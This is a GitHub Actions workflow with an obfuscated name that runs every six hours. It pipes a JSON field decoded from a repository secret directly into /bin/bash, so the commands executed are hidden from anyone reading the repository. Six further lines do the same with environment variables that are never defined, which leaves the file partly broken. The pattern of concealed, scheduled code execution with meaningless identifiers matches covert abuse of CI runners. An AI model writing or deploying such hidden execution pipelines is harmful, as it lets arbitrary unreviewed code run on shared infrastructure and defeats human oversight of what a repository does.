name: nongyuxxo

on:
  workflow_dispatch:
  schedule:
    - cron: '15 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nongyuxxo
        env:
          fj95854: ${{ secrets.fj95854 }}
        run: |
          echo $fj95854 | jq -r .raeh5 | /bin/bash
          echo $u8568 | jq -r .ctrz020 | /bin/bash
          echo $lqxw04006 | jq -r .dg50 | /bin/bash
          echo $ajuy75854 | jq -r .lwhlp8 | /bin/bash
          echo $h53 | jq -r .wikal91 | /bin/bash
          echo $df9899 | jq -r .fxhsa494 | /bin/bash
          echo $lvu08675 | jq -r .xw70 | /bin/bash

